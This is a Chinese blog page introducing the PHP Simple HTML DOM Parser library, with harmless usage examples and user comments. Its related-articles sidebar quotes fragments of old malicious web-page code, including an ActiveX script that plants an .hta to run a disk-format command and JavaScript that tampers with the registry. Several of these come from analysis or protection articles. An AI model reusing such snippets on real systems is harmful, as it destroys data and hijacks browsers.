阅读更多

SourceForge项目:PHP Simple HTML DOM Parser

成立时间:2008-02-19

项目介绍
PHP Simple HTML DOM Parser 是一个html解析工具,支持以一种超级简单的方式操纵HTML。这个是PHP5版,是根据原作者Jose Solorzano的HTML Parser for PHP 4改写而成。

 

 

项目说明
项目管理者:me578022
编程语言:PHP
许可:MIT License

 

从Sourceforge上下载:http://sourceforge.net/projects/simplehtmldom/files/simplehtmldom/1.11/simplehtmldom_1_11.zip/download


特性:

  • 采用PHP5+开发的一个简单的PHPHTMLDOM分析;
  • 需要PHP5+
  • 支持invalidHTML并提供非常简单的方式来操作HTML元素;
  • 在HMTL页面上查找标签所使用的语法与jQuery(一个轻量级,实用的javascript框架)相似;
  • 从页面中抽取内容只需要一行代码

示例:
1.如何获取HTML元素:
// Create DOM from URL or file
$html = file_get_html('http://www.google.com/');

// Find all images
foreach($html->find('img') as $element)
       echo $element->src . '<br>';

// Find all links
foreach($html->find('a') as $element)
       echo $element->href . '<br>';


2.如何定义HTML元素:

// Create DOM from string
$html = str_get_html('<div id="hello">Hello</div><div id="world">World</div>');

$html->find('div', 1)->class = 'bar';

$html->find('div[id=hello]', 0)->innertext = 'foo';

echo $html; // Output: <div id="hello">foo</div><div id="world" class="bar">World</div>

 

项目页:http://simplehtmldom.sourceforge.net/

 

更多sourceforge优秀项目

 

sourceforge优秀项目介绍之五十:Frets On Fire “热火吉他手”

sourceforge优秀项目介绍之五十三:silex “开源RIA”

sourceforge优秀项目介绍之五十八:Mumble“跨平台的VOIP软件”

来自: sourceforge.net
4
1
评论 共 2 条 请登录后发表评论
2 楼 bigbenz8 2009-11-23 10:33
以前用过 ,这东西确实好用
1 楼 trains629 2009-11-20 22:07
一直用这个 ,自己的很多项目使用这个解析html,很方便

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

  • 获得COM组件(ocx、dll)的CLSID小工具

    不用OLE View工具,也可以获得com组件(ocx、dll)的类名和对应的clsid。此工具通过访问注册表,获得某个已经注册的com组件(ocx、dll)的所有类名和对应的clsid。

  • 恶意代码大暴光

    许多网友纷纷指出有的网站不择手段,当用户访问过它们的网页后,不仅IE默认首页被篡改了,而且每次开机 后IE都会自动弹出访问该网站。  我们通过对下面这段javascript程序的解剖,希望读者能明白其究竟,并掌握修复的方法。网站应该用丰富精彩的栏目来吸引访问者,希望通过对用户注册表的恶意篡改来达到提高访问 量的目的不仅会事得其反,更是一 种不道德的行为。   下面就来说说怎样通过html文件

  • JavaScript修改注册表的例子

    document.write("&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;");function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +"....

  • 网页脚本病毒理解与防护

    一、脚本病毒的背景知识介绍 脚本病毒是指利用.asp、.htm、.html、.vbs、.js类型的文件进行传播的基于VB Script和Java Script脚本语言并由Windows Scripting Host解释执行的这类病毒。 脚本语言的功能非常强大,它们利用Windows系统具有开放性的特点,通过调用一些现成的Windows对象和组件,可以直接对文件系统、注册表等进行控制。脚本病毒正是利用脚本语言的这些特点,通过ActiveX进行网页传播,通过OE的自动发送邮件功能进行邮件传

  • 一段恶意脚本的分析及思考

    这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下: &amp;lt;script&amp;gt; document.write(&quot;&amp;lt;APPLET HEIGHT=0 WIDTH=0 code=com...

  • 网页特效

    101,Q:XML 中能不能用中文标记 xml?     A:可以。如:                   属性2 CDATA #IMPLIED>]>  102,Q:用 Dreamweaver 制作拖拽的拼图效果     A:    (一)、

  • 网页恶意代码大总结

    ————————> 格式化硬盘 scr.Reset(); scr.Path="C://windows//Men?inicio//Programas//Inicio//automat.hta"; scr.Doc="wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the

  • 执行EXE文件的网页代码

    执行EXE文件的网页代码 让IE6.0执行EXE文件的网页 下面我们来看看怎么让6.0来执行我们空间的同路径下的一个EXE文件,方法大致是当用户开启第一个HTML的页面时,通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们所...

  • IE浏览器破坏方法源代码解释!

    IE浏览器破坏方法源代码解释! ****** language="java******"> document.write(""); //建立加入收藏夹和链接的事件 function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "////" + DispName +".URL"); Shor.Ta

  • 收集十七项网页恶意代码(转)

    1、格式化硬盘 <object id=&quot;scr&quot; classid=&quot;clsid:06290BD5-48AA-11D2-8432-006008C3FBFC&quot;> </object> <script> scr.Reset(); scr.Path=&quot;C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta&quot;; scr.Doc=&quot;<object id=w...

  • 恶意代码(黑客)` 仅供学习

                                                            1、格式化硬盘[Copy to clipboard]CODE: scr.Reset(); scr.Path="C:/windows/Men?inicio/Programas/Inicio/automat.hta"; scr.Doc="wsh.Run(start /m format a

  • 新型计算机病毒

    当前,感染可执行文件、数据文件和引导区的病毒已经是过去时,蠕虫、木马、僵尸和RootKit才是计算机病毒进行时。 流行病毒的关键技术 蠕虫病毒 利用Outlook漏洞编写病毒 Webpage中的恶意代码 流氓软件 蠕虫病毒 蠕虫这个名词的由来是在1982年,Shock和Hupp根据《The Shockwave Rider》一书中的概念提出了一种“蠕虫(Worm)”程序的思想。 蠕虫(Worm...

  • java 实现opc代码实现,附加问题解决方法和错误编码详解

    mavenOPC客户端/*** @Auther: 夏* @Description: opc da客户端*/@Slf4j/*** 初始化连接信息*//*** 设置备用服务地址*//*** 创建连接*/return;// 域 为空try {log.error("opc 地址错误:", e);log.error("opc 连接失败:", e);log.info("开始连接备用服务...");

  • CLSID和ProgID的转换

    HRESULT CLSIDFromProgID(LPCOLESTR lpszProgID,     // 指向ProgID的指针LPCLSID pclsid             // 指向CLSID的指针);WINOLEAPI ProgIDFromCLSID(REFCLSID clsid,       // CLSID 的值,已知LPOLESTR * lplpszProgID   // 指向接

  • 国内资深黑客详谈网页木马(7)

     六、常用网页木马运行原理的分析 1.javascript.Exception.Exploit常用的攻击代码:Function destroy(){ try { //ActiveX initialization 初始化ActiveX,为修改注册表做准备 a1=document.applets[0];  //获取applet运行对象,以下语句指向注册表中有关IE的表项a1.setCLSI

  • 教你如何拒绝带病毒的恶意网页陷阱

    常在网上漂.谁能不中招?相信大家都郁闷中马之后的破电脑的吧,今天教大家来如何躲过那些表面平静,却暗藏病毒的网页陷阱。先想想,如果是我们中了马或病毒,那木马总要执行吧,但我们把它的执行那条路封掉,那还能执行么? 所以我们先找到这些个可能被执行的地方!C:\Documents and Settings\Administrator\Local Settings\TempC:\Documents and ...

  • 常用电脑类标识符CLSID,方便你编辑注册表

    常用电脑类标识符CLSID,方便你编辑注册表

Global site tag (gtag.js) - Google Analytics